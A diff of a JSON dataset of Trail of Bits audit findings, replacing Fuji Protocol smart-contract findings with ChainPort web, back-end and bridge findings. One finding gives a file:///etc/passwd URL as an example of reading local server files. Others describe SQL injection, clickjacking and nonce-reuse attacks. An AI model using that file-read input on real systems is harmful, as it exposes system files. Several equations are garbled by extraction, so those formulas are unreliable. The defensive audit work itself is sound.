"https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The white paper documents the Controller contracts ability to perform partial renancing operations. These operations move only a fraction of debt and collateral from one provider to another to prevent unprotable interest rate slippage. However, the protocol does not correctly support partial renancing situations in which debt and collateral are spread across multiple providers. For example, payback and withdrawal operations always interact with the current provider, which might not contain enough funds to execute these operations. Additionally, the interest rate indexes are computed only from the debt owed to the current provider, which might not accurately reect the interest rate across all providers. Exploit Scenario An executor performs a partial renancing operation. Interest rates are computed incorrectly, resulting in a loss of funds for either the users or the protocol. Recommendations Short term, disable partial renancing until the protocol supports it in all situations. Long term, ensure that functionality that is not fully supported by the protocol cannot be used by accident. 30 Fuji Protocol", + "title": "10. Use of libraries with known vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back-end repository uses outdated libraries with known vulnerabilities. We used pip-audit, a tool developed by with support from Google to audit Python environments and dependency trees for known vulnerabilities, and identied two known vulnerabilities in the projects dependencies (as shown in gure 10.1). [REDACTED] Figure 10.1: A list of outdated libraries in the back-end repository Recommendations Short term, update the projects dependencies to their latest versions wherever possible. Use pip-audit to conrm that no vulnerable dependencies remain. Long term, add pip-audit to the projects CI/CD pipeline. Do not allow builds to succeed with dependencies that have known vulnerabilities.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "11. Native support for ether increases the codebases complexity ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The protocol supports ERC20 tokens and Ethereums native currency, ether. Ether transfers follow dierent semantics than token transfers. As a result, many functions contain extra code, like the code shown in gure 11.1, to handle ether transfers. if (vAssets.borrowAsset == ETH) { require(msg.value >= amountToPayback, Errors.VL_AMOUNT_ERROR); if (msg.value > amountToPayback) { IERC20Upgradeable(vAssets.borrowAsset).univTransfer( payable(msg.sender), msg.value - amountToPayback ); } } else { // Check User Allowance require( IERC20Upgradeable(vAssets.borrowAsset).allowance(msg.sender, address(this)) >= amountToPayback, Errors.VL_MISSING_ERC20_ALLOWANCE ); Figure 11.1: FujiVault.sol#L319-333 This extra code increases the codebases complexity. Furthermore, functions will behave dierently depending on their arguments. Recommendations Short term, replace native support for ether with support for ERC20 WETH. This will decrease the complexity of the protocol and the likelihood of bugs. 31 Fuji Protocol", + "title": "11. Use of JavaScript instead of TypeScript ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The ChainPort front end is developed with JavaScript instead of TypeScript. TypeScript is a strongly typed language that compiles to JavaScript. It allows developers to specify the types of variables and function arguments, and TypeScript code will fail to compile if there are type mismatches. Contrarily, JavaScript code will crash (or worse) during runtime if there are type mismatches. In summary, TypeScript is preferred over JavaScript for the following reasons: It improves code readability; developers can easily identify variable types and the types that functions receive. It improves security by providing static type checking that catches errors during compilation. It improves support for integrated development environments (IDEs) and other tools by allowing them to reason about the types of variables. Exploit Scenario A bug in the front-end application is missed, and the code is deployed in production. The bug causes the application to crash, preventing users from using it. This bug would have been caught if the front-end application were written in TypeScript. Recommendations Short term, rewrite newer parts of the application in TypeScript. TypeScript can be used side-by-side with JavaScript in the same application, allowing it to be introduced gradually. Long term, gradually rewrite the whole application in TypeScript.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "12. Missing events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notied about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack. Recommendations Short term, ensure that all state-changing operations emit events. Long term, use an event monitoring system like Tenderly or Defender, use Defenders automated incident response feature, and develop an incident response plan to follow in case of an emergency. 32 Fuji Protocol 13. Indexes are not updated before all operations that require up-to-date indexes Severity: High Diculty: Low Type: Undened Behavior Finding ID: TOB-FUJI-013 Target: FujiVault.sol, FujiERC1155.sol, FLiquidator.sol", + "title": "12. Use of .format to create SQL queries ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The back end builds SQL queries with the .format function. An attacker that controls one of the variables that the function is formatting will be able to inject SQL code to steal information or damage the database. [REDACTED] Figure 12.1: chainport-backend/project/data/db/postgres.py#L4-L24 [REDACTED] Figure 12.2: chainport-backend/project/lambdas/database_monitor/clear_lock.py#L29-L31 None of the elds described above are attacker-controlled, so we set the severity of this nding to informational. However, the use of .format to create SQL queries is an anti-pattern; parameterized queries should be used instead. Exploit Scenario A developer copies the vulnerable code to create a new SQL query. This query receives an attacker-controlled string. The attacker conducts a time-based SQL injection attack, leaking the whole database. Recommendations Short term, use parameterized queries instead of building strings with variables by hand. Long term, create or use a static analysis check that forbids this pattern. This will ensure that this pattern is never reintroduced by a less security-aware developer.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Medium" ] }, { - "title": "14. No protection against missing index updates before operations that depend on up-to-date indexes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contracts updateF1155Balances function is responsible for updating indexes. This function must be called before all operations that read indexes (TOB-FUJI-013). However, the protocol does not protect against situations in which indexes are not updated before they are read; these situations could result in incorrect accounting. Exploit Scenario Developer Bob adds a new operation that reads indexes, but he forgets to add a call to updateF1155Balances. As a result, the new operation uses outdated index values, which causes incorrect accounting. Recommendations Short term, redesign the index calculations so that they provide protection against the reading of outdated indexes. For example, the index calculation process could keep track of the last index updates block number and access indexes exclusively through a getter, which updates the index automatically, if it has not already been updated for the current block. Since ERC-1155s balanceOf and totalSupply functions do not allow side eects, this solution would require the use of dierent functions internally. Long term, use defensive coding practices to ensure that critical operations are always executed when required. 34 Fuji Protocol", + "title": "13. Many rules are disabled in the ESLint conguration ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "There are 34 rules disabled in the front-end eslint conguration. Disabling some of these rules does not cause problems, but disabling others reduces the codes security and reliability (e.g., react/no-unescaped-entities, consistent-return, no-shadow) and the codes readability (e.g., react/jsx-boolean-value, react/jsx-one-expression-per-line). Furthermore, the code contains 46 inline eslint-disable comments to disable specic rules. While disabling some of these rules in this way may be valid, we recommend adding a comment to each instance explaining why the specic rule was disabled. Recommendations Short term, create a list of rules that can be safely disabled without reducing the codes security or readability, document the justication, and enable every other rule. Fix any ndings that these rules may report. For rules that are disabled with inline eslint-disable comments, include explanatory comments justifying why they are disabled.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "15. Formula for index calculation is unnecessarily complex ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Indexes are updated within the FujiERC1155 contracts updateState function, shown in gure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee. } } Figure 15.1: FujiERC1155.sol#L40-57 The code in gure 14.1 translates to the following equation: = 1 * (1 + ( )/ 1 ) 1 Using the distributive property, we can transform this equation into the following: = 1 / * (1 + 1 This version can then be simplied: / 1 ) 1 = 1 / * (1 + 1 1) 35 Fuji Protocol Finally, we can simplify the equation even further: = 1 / * 1 The resulting equation is simpler and more intuitively conveys the underlying ideathat the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the Fuji1155Contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly. 36 Fuji Protocol 16. Flashers initiateFlashloan function does not revert on invalid ashnum values Severity: Low Diculty: High Type: Data Validation Finding ID: TOB-FUJI-016 Target: Flasher.sol", + "title": "14. Congress can lose quorum after manually setting the quorum value ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Proposals to the ChainPort congress must be approved by a minimum quorum of members before they can be executed. By default, when a new member is added to the congress, the quorum is updated to be N 1, where N is the number of congress members. [REDACTED] Figure 14.1: smart-contracts/contracts/governance/ChainportCongressMembersRegistry.so l#L98-L119 However, the congress has the ability to overwrite the quorum number to any nonzero number, including values larger than the current membership. [REDACTED] Figure 14.2: smart-contracts//contracts/governance/ChainportCongressMembersRegistry.s ol#L69-L77 If the congress manually lowers the quorum number and later adds a member, the quorum number will be reset to one less than the total membership. If for some reason certain members are temporarily or permanently unavailable (e.g., they are on vacation or their private keys were destroyed), the minimum quorum would not be reached. Exploit Scenario The ChainPort congress is composed of 10 members. Alice submits a proposal to reduce the minimum quorum to six members to ensure continuity while several members take vacations over a period of several months. During this period, a proposal to add Bob as a new member of the ChainPort congress is passed while Carol and Dave, two other congress members, are on vacation. This unexpectedly resets the minimum quorum to 10 members of the 11-person congress, preventing new proposals from being passed. Recommendations Short term, rewrite the code so that, when a new member is added to the congress, the minimum quorum number increases by one rather than being updated to the current number of congress members subtracted by one. Add a cap to the minimum quorum number to prevent it from being manually set to values larger than the current membership of the congress. Long term, uncouple operations for increasing and decreasing quorum values from operations for making congress membership changes. Instead, require that such operations be included as additional actions in proposals for membership changes.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "17. Docstrings do not reect functions implementations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The docstring of the FujiVault contracts withdraw function states the following: * @param _withdrawAmount: amount of collateral to withdraw * otherwise pass -1 to withdraw maximum amount possible of collateral (including safety factors) Figure 17.1: FujiVault.sol#L188-189 However, the maximum amount is withdrawn on any negative value, not only on a value of -1. A similar inconsistency between the docstring and the implementation exists in the FujiVault contracts payback function. Recommendations Short term, adjust the withdraw and payback functions docstrings or their implementations to make them match. Long term, ensure that docstrings always match the corresponding functions implementation. 38 Fuji Protocol", + "title": "15. Potential race condition could allow users to bypass PORTX fee payments ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "ChainPort fees are paid either as a 0.3% fee deducted from the amount transferred or as a 0.2% fee in PORTX tokens that the user has deposited into the ChainportFeeManager contract. To determine whether a fee should be paid in the base token or in PORTX, the back end checks whether the user has a sucient PORTX balance in the ChainportFeeManager contract. [REDACTED] Figure 15.1: chainport-backend//project/lambdas/fees/fees.py#L219-249 However, the ChainportFeeManager contract does not enforce an unbonding period, a period of time before users can unstake their PORTX tokens. [REDACTED] Figure 15.2: smart-contracts/contracts/ChainportFeeManager.sol#L113-L125 Since pending fee payments are generated as part of deposit, transfer, and burn events but the actual processing is handled by a separate monitor, it could be possible for a user to withdraw her PORTX tokens on-chain after the deposit event has been processed and before the fee payment transaction is conrmed, allowing her to avoid paying a fee for the transfer. Exploit Scenario Alice uses ChainPort to bridge one million USDC from the Ethereum mainnet to Polygon. She has enough PORTX deposited in the ChainportFeeManager contract to cover the $2,000 fee. She watches for the pending fee payment transaction and front-runs it to remove her PORTX from the ChainportFeeManager contract. Her transfer succeeds, but she is not required to pay the fee. Recommendations Short term, add an unbonding period preventing users from unstaking PORTX before the period has passed. Long term, ensure that deposit, transfer, and redemption operations are executed atomically with their corresponding fee payments.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "18. Harvesters getHarvestTransaction function does not revert on invalid _farmProtocolNum and harvestType values ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The Harvester contracts getHarvestTransaction function incorrectly returns claimedToken and transaction values of 0 if the _farmProtocolNum parameter is set to a value greater than 1 or if the harvestType value is set to value greater than 2. However, the function does not revert on invalid _farmProtocolNum and harvestType values. function getHarvestTransaction(uint256 _farmProtocolNum, bytes memory _data) external view override returns (address claimedToken, Transaction memory transaction) { if (_farmProtocolNum == 0) { transaction.to = 0x3d9819210A31b4961b30EF54bE2aeD79B9c9Cd3B; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimComp(address)\")), msg.sender ); claimedToken = 0xc00e94Cb662C3520282E6f5717214004A7f26888; } else if (_farmProtocolNum == 1) { uint256 harvestType = abi.decode(_data, (uint256)); if (harvestType == 0) { // claim (, address[] memory assets) = abi.decode(_data, (uint256, address[])); transaction.to = 0xd784927Ff2f95ba542BfC824c8a8a98F3495f6b5; transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"claimRewards(address[],uint256,address)\")), assets, type(uint256).max, msg.sender ); } else if (harvestType == 1) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; transaction.data = abi.encodeWithSelector(bytes4(keccak256(\"cooldown()\"))); } else if (harvestType == 2) { // transaction.to = 0x4da27a545c0c5B758a6BA100e3a049001de870f5; 39 Fuji Protocol transaction.data = abi.encodeWithSelector( bytes4(keccak256(\"redeem(address,uint256)\")), msg.sender, type(uint256).max ); claimedToken = 0x7Fc66500c84A76Ad7e9c93437bFc5Ac33E2DDaE9; } } } Figure 18.1: Harvester.sol#L13-54 Exploit Scenario Alice, an executor of the Fuji Protocol, calls getHarvestTransaction with the _farmProtocolNum parameter set to 2. As a result, rather than reverting, the function returns claimedToken and transaction values of 0. Recommendations Short term, revise getHarvestTransaction so that it reverts if it is called with invalid farmProtocolNum or harvestType values. Long term, ensure that all functions revert if they are called with invalid values. 40 Fuji Protocol", + "title": "16. Signature-related code lacks a proper specication and documentation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "ChainPort uses signatures to ensure that messages to mint and release tokens were generated by the back end. These signatures are not well documented, and the properties they attempt to provide are often unclear. For example, answers to the following questions are not obvious; we provide example answers that could be provided in the documentation of ChainPorts use of signatures: Why does the signed message contain a networkId eld, and why does it have to be unique? If not, an operation to mint tokens on one chain could be replayed on another chain. Why does the signed message contain an action eld? The action eld prevents replay attacks in networks that have both a main and side bridge. Without this eld, a signature for minting tokens could be used on a sidechain contract of the same network to release tokens. Why are both the signature and nonce checked for uniqueness in the contracts? The signatures could be represented in more than one format, which means that storing them is not enough to ensure uniqueness. Recommendations Short term, create a specication describing what the signatures protect against, what properties they attempt to provide (e.g., integrity, non-repudiation), and how these properties are provided.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "19. Lack of data validation in Controllers doRenancing function ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The Controller contracts doRefinancing function does not check the _newProvider value. Therefore, the function accepts invalid values for the _newProvider parameter. function doRefinancing( address _vaultAddr, address _newProvider, uint256 _ratioA, uint256 _ratioB, uint8 _flashNum ) external isValidVault(_vaultAddr) onlyOwnerOrExecutor { IVault vault = IVault(_vaultAddr); [...] [...] IVault(_vaultAddr).setActiveProvider(_newProvider); } Figure 19.1: Controller.sol#L44-84 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller.doRefinancing with the _newProvider parameter set to the same address as the active provider. As a result, unnecessary ash loan fees will be paid. Recommendations Short term, revise the doRefinancing function so that it reverts if _newProvider is set to the same address as the active provider. Long term, ensure that all functions revert if they are called with invalid values. 41 Fuji Protocol", + "title": "17. Cryptographic primitives lack sanity checks and clear function names ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Several cryptographic primitives are missing sanity checks on their inputs. Without such checks, problems could occur if the primitives are used incorrectly. The remove_0x function (gure 17.1) does not check that the input starts with 0x. A similar function in the eth-utils library has a more robust implementation, as it includes a check on its input (gure 17.2). [REDACTED] Figure 17.1: chainport-backend/modules/cryptography_2key/signatures.py#L10-L16 [REDACTED] Figure 17.2: ethereum/eth-utils/eth_utils/hexadecimal.py#L43-L46 The add_leading_0 function's name does not indicate that the value is padded to a length of 64 (gure 17.3). [REDACTED] Figure 17.3: chainport-backend/modules/cryptography_2key/signatures.py#L19-L25 The _build_withdraw_message function does not ensure that the beneficiary_address and token_address inputs have the expected length of 66 bytes and that they start with 0x (gure 17.4). [REDACTED] Figure 17.4: chainport-backend/modules/cryptography_2key/signatures.py#L28-62 We did not identify problems in the way these primitives are currently used in the code, so we set the severity of this nding to informational. However, if the primitives are used improperly in the future, cryptographic bugs that can have severe consequences could be introduced, which is why we highly recommend xing the issues described in this nding. Exploit Scenario A developer fails to understand the purpose of a function or receives an input from outside the system that has an unexpected format. Because the functions lack sanity checks, the code fails to do what the developer expected. This leads to a cryptographic vulnerability and the loss of funds. Recommendations Short term, add the missing checks and x the naming issues described above. Where possible, use well-reviewed libraries rather than implementing cryptographic primitives in-house. Long term, review all the cryptographic primitives used in the codebase to ensure that the functions purposes are clear and that functions perform sanity checks, preventing them from being used improperly. Where necessary, add comments to describe the functions purposes.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1390,109 +1390,109 @@ ] }, { - "title": "20. Lack of data validation on function parameters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Certain setter functions fail to validate the addresses they receive as input. The following addresses are not validated: The addresses passed to all setters in the FujiAdmin contract The _newFujiAdmin address in the setFujiAdmin function in the Controller and FujiVault contracts The _provider address in the FujiVault.setActiveProvider function The _oracle address in the FujiVault.setOracle function The _providers addresses in the FujiVault.setProviders function The newOwner address in the transferOwnership function in the Claimable and ClaimableUpgradeable contracts Exploit scenario Alice, a member of the Fuji Protocol team, invokes the FujiVault.setOracle function and sets the oracle address as address(0). As a result, code relying on the oracle address is no longer functional. Recommendations Short term, add zero-value or contract existence checks to the functions listed above to ensure that users cannot accidentally set incorrect values, misconguring the protocol. Long term, use Slither, which will catch missing zero checks. 42 Fuji Protocol", + "title": "18. Use of requests without the timeout argument ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The Python requests library is used in the ChainPort back end without the timeout argument. By default, the requests library will wait until the connection is closed before fullling a request. Without the timeout argument, the program will hang indenitely. The following locations in the back-end code are missing the timeout argument: chainport-backend/modules/coingecko/api.py#L29 chainport-backend/modules/requests_2key/requests.py#L14 chainport-backend/project/stats/cg_prices.py#L74 chainport-backend/project/stats/cg_prices.py#L95 The code in these locations makes requests to the following websites: https://api.coingecko.com https://ethgasstation.info https://gasstation-mainnet.matic.network If any of these websites hang indenitely, so will the back-end code. Exploit Scenario One of the requested websites hangs indenitely. This causes the back end to hang, and token ports from other users cannot be processed. Recommendations Short term, add the timeout argument to each of the code locations indicated above. This will ensure that the code will not hang if the website being requested hangs. Long term, integrate Semgrep into the CI pipeline to ensure that uses of the requests library always have the timeout argument.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "12. Missing events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notied about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack. Recommendations Short term, ensure that all state-changing operations emit events. Long term, use an event monitoring system like Tenderly or Defender, use Defenders automated incident response feature, and develop an incident response plan to follow in case of an emergency. 32 Fuji Protocol", + "title": "19. Lack of noopener attribute on external links ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "In the ChainPort front-end application, there are links to external websites that have the target attribute set to _blank but lack the noopener attribute. Without this attribute, an attacker could perform a reverse tabnabbing attack. [REDACTED] Figure 19.1: chainport-app/src/modules/exchange/components/PortOutModal.jsx#L126 Exploit Scenario An attacker takes control of one of the external domains linked by the front end. The attacker prepares a malicious script on the domain that uses the window.opener variable to control the parent windows location. A user clicks on the link in the ChainPort front end. The malicious website is opened in a new window, and the original ChainPort front end is seamlessly replaced by a phishing website. The victim then returns to a page that appears to be the original ChainPort front end but is actually a web page controlled by the attacker. The attacker tricks the user into transferring his funds to the attacker. Recommendations Short term, add the missing rel=\"noopener noreferrer\" attribute to the anchor tags. References OWASP: Reverse tabnabbing attacks", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "13. Indexes are not updated before all operations that require up-to-date indexes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contracts updateF1155Balances function is responsible for updating indexes. However, this function is not called before all operations that read indexes. As a result, these operations use outdated indexes, which results in incorrect accounting and could make the protocol vulnerable to exploits. FujiVault.deposit calls FujiERC1155._mint, which reads indexes but does not call updateF1155Balances. FujiVault.paybackLiq calls FujiERC1155.balanceOf, which reads indexes but does not call updateF1155Balances. Exploit Scenario The indexes have not been updated in one day. User Bob deposits collateral into the FujiVault. Day-old indexes are used to compute Bobs scaled amount, causing Bob to gain interest for an additional day for free. Recommendations Short term, ensure that all operations that require up-to-date indexes rst call updateF1155Balances. Write tests for each function that depends on up-to-date indexes with assertions that fail if indexes are outdated. Long term, redesign the way indexes are accessed and updated such that a developer cannot simply forget to call updateF1155Balances. 33 Fuji Protocol", + "title": "20. Use of urllib could allow users to leak local les ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "To upload images of new tokens to S3, the upload_media_from_url_to_s3 function uses the urllib library (gure 20.1), which supports the file:// scheme; therefore, if a malicious actor controls a dynamic value uploaded to S3, she could read arbitrary local les. [REDACTED] Figure 20.1: chainport-backend/modules/infrastructure/aws/s3.py#L25-29 The code in gure 20.2 replicates this issue. [REDACTED] Figure 20.2: Code to test urlopens support of the file:// scheme We set the severity of this nding to undetermined because it is unclear whether an attacker (e.g., a token owner) would have control over token images uploaded to S3 and whether the server holds les that an attacker would want to extract. Exploit Scenario A token owner makes the image of his token point to a local le (e.g., file:///etc/passwd). This local le is uploaded to the S3 bucket and is shown to an attacker attempting to port his own token into the ChainPort front end. The local le is leaked to the attacker. Recommendations Short term, use the requests library instead of urllib. The requests library does not support the file:// scheme.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "15. Formula for index calculation is unnecessarily complex ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Indexes are updated within the FujiERC1155 contracts updateState function, shown in gure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee. } } Figure 15.1: FujiERC1155.sol#L40-57 The code in gure 14.1 translates to the following equation: = 1 * (1 + ( )/ 1 ) 1 Using the distributive property, we can transform this equation into the following: = 1 / * (1 + 1 This version can then be simplied: / 1 ) 1 = 1 / * (1 + 1 1) 35 Fuji Protocol Finally, we can simplify the equation even further: = 1 / * 1 The resulting equation is simpler and more intuitively conveys the underlying ideathat the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the Fuji1155Contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly. 36 Fuji Protocol", + "title": "21. The front end is vulnerable to iFraming ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The ChainPort front end does not prevent other websites from iFraming it. Figure 21.1 shows an example of how another website could iFrame the ChainPort front end. [REDACTED] Figure 21.1: An example of how another website could iFrame the ChainPort front end Exploit Scenario An attacker creates a website that iFrames ChainPorts front end. The attacker performs a clickjacking attack to trick users into submitting malicious transactions. Recommendations Short term, add the X-Frame-Options: DENY header on every server response. This will prevent other websites from iFraming the ChainPort front end.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "16. Flashers initiateFlashloan function does not revert on invalid ashnum values ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The Flasher contracts initiateFlashloan function does not initiate a ash loan or perform a renancing operation if the flashnum parameter is set to a value greater than 2. However, the function does not revert on invalid flashnum values. function initiateFlashloan(FlashLoan.Info calldata info, uint8 _flashnum) external isAuthorized { if (_flashnum == 0) { _initiateAaveFlashLoan(info); } else if (_flashnum == 1) { _initiateDyDxFlashLoan(info); } else if (_flashnum == 2) { _initiateCreamFlashLoan(info); } } Figure 16.1: Flasher.sol#L61-69 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller. doRefinancing with the flashnum parameter set to 3. As a result, no ash loan is initialized, and no renancing happens; only the active provider is changed. This results in unexpected behavior. For example, if a user wants to repay his debt after renancing, the operation will fail, as no debt is owed to the active provider. Recommendations Short term, revise initiateFlashloan so that it reverts when it is called with an invalid flashnum value. Long term, ensure that all functions revert if they are called with invalid values. 37 Fuji Protocol", + "title": "22. Lack of CSP header in the ChainPort front end ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The ChainPort front end lacks a Content Security Policy (CSP) header, leaving it vulnerable to cross-site scripting (XSS) attacks. A CSP header adds extra protection against XSS and data injection attacks by enabling developers to select the sources that the browser can execute or render code from. This safeguard requires the use of the CSP HTTP header and appropriate directives in every server response. Exploit Scenario An attacker nds an XSS vulnerability in the ChainPort front end and crafts a custom XSS payload. Because of the lack of a CSP header, the browser executes the attack, enabling the attacker to trick users into transferring their funds to him. Recommendations Short term, use a CSP header in the ChainPort front end and validate it with the CSP Evaluator. This will help mitigate the eects of XSS attacks. Long term, track the development of the CSP header and similar web browser features that help mitigate security risks. Ensure that new protections are adopted as quickly as possible. References HTTP Content Security Policy (CSP) Google CSP Evaluator Google Web Security Fundamentals: Eval Google Web Security Fundamentals: Inline code is considered harmful", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "21. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Fuji Protocol has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-jscauses a security vulnerability in the Fuji Protocol contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity. 43 Fuji Protocol A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", + "title": "1. Related-nonce attacks across keys allow root key recovery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "Given multiple addresses generated by the same sender, if any two signatures with the associated private keys use the same nonce, then the recipients private root key can be recovered. Nonce reuse attacks are a known risk for single ECDSA keys, but this attack extends the vulnerability to all keys generated by a given sender. Exploit Scenario Alice uses Bobs public key to generate addresses 1 = ( ||1 ) * + and = ( ||2 ) * + and deposits funds in each. Bobs corresponding private 2 keys will be 1 does not know ||1 ) + = ( 2 , she does know the dierence of the two: 2 = ( ||2 ) + and 1 or . Note that, while Alice 